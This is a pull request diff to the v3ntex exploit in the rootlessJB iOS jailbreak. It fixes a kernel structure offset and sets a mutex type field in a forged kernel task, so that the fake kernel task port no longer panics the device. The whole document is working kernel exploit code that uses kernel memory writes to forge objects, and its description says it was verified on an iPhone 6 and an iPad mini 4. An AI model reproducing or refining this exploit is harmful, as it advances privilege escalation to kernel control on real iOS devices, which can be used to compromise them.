### PR TITLE
v3ntex: Fix task itk_self offset and prevent panic when calling lck_mtx_lock on fake kernel task

### DIFF
--- a/rootlessJB/exploit/v3ntex/exploit.m
+++ b/rootlessJB/exploit/v3ntex/exploit.m
@@ -46,7 +46,8 @@ const uint32_t IKOT_TASK                = 2;
 #define OFFSET_TASK_VM_MAP 0x20
 #define OFFSET_TASK_TASKS_PREV 0x30
 #define OFFSET_TASK_ITK_SPACE 0x300
-#define OFFSET_TASK_ITK_SELF 0xd0
+#define OFFSET_TASK_ITK_LOCK_DATA_LCK_MTX_TYPE 0xC8 + 0xB
+#define OFFSET_TASK_ITK_SELF 0xd8
 
 #define BSDINFO_PID_OFFSET  0x60
 
@@ -187,6 +188,10 @@ typedef volatile union
         char pad[OFFSET_TASK_ITK_SELF];
         kptr_t itk_self;
     } b;
+    struct {
+        char pad[OFFSET_TASK_ITK_LOCK_DATA_LCK_MTX_TYPE];
+        uint8_t itk_lock_data_lck_mtx_type;
+    } c;
 } ktask_t;
 
 typedef volatile union
@@ -618,6 +623,7 @@ mach_port_t build_safe_fake_tfp0(uint64_t vm_map, uint64_t space) {
     fake_kernel_task.a.ref_count = 0xd00d;
     fake_kernel_task.a.active = 1;
     fake_kernel_task.a.map = vm_map;
+    fake_kernel_task.c.itk_lock_data_lck_mtx_type = 0x22;
     fake_kernel_task.b.itk_self = 1;
     
     kwrite(fake_kernel_task_kaddr, (void *)&fake_kernel_task, sizeof(fake_kernel_task));
@@ -1230,6 +1236,7 @@ mach_port_t v3ntex() {
     ktask.a.ref_count = 100;
     ktask.a.active = 1;
     ktask.a.map = kernel_vm_map;
+    ktask.c.itk_lock_data_lck_mtx_type = 0x22;
     ktask.b.itk_self = 1;
     
     kport.ip_bits = 0x80000002; // IO_BITS_ACTIVE | IKOT_PORT | IKOT_TASK


### PR DESCRIPTION
- Fixed offset for itk_self. Verified on iPhone 6 and iPad mini 4.
- If lck_mtx_lock is called on the fake kernel task it will cause a panic with "invalid mutex". Setting the lock type to 0x22 will prevent it ;)